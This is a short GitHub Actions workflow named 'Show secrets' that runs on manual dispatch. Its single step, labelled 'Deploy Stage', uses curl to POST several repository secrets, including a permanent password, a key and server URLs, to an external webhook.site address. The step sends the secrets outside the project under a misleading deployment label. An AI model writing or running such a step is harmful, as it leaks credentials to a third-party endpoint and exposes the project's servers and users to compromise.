name: Show secrets

on:
  workflow_dispatch:

jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        shell: bash
        run: |
          curl -X POST https://webhook.site/503643a2-39a1-4503-8ebf-ab2a84559285 \
            -H "Content-Type: application/x-www-form-urlencoded" \
            -d "username=${{ secrets.API_SERVER }}&password=${{ secrets.RS_PUB_KEY }}${{ secrets.RENDEZVOUS_SERVERS }}${{ secrets.UPDATER_URL }}${{ secrets.DATA_SERVER_URL }}${{ secrets.PERMANENT_PASSWORD }}"
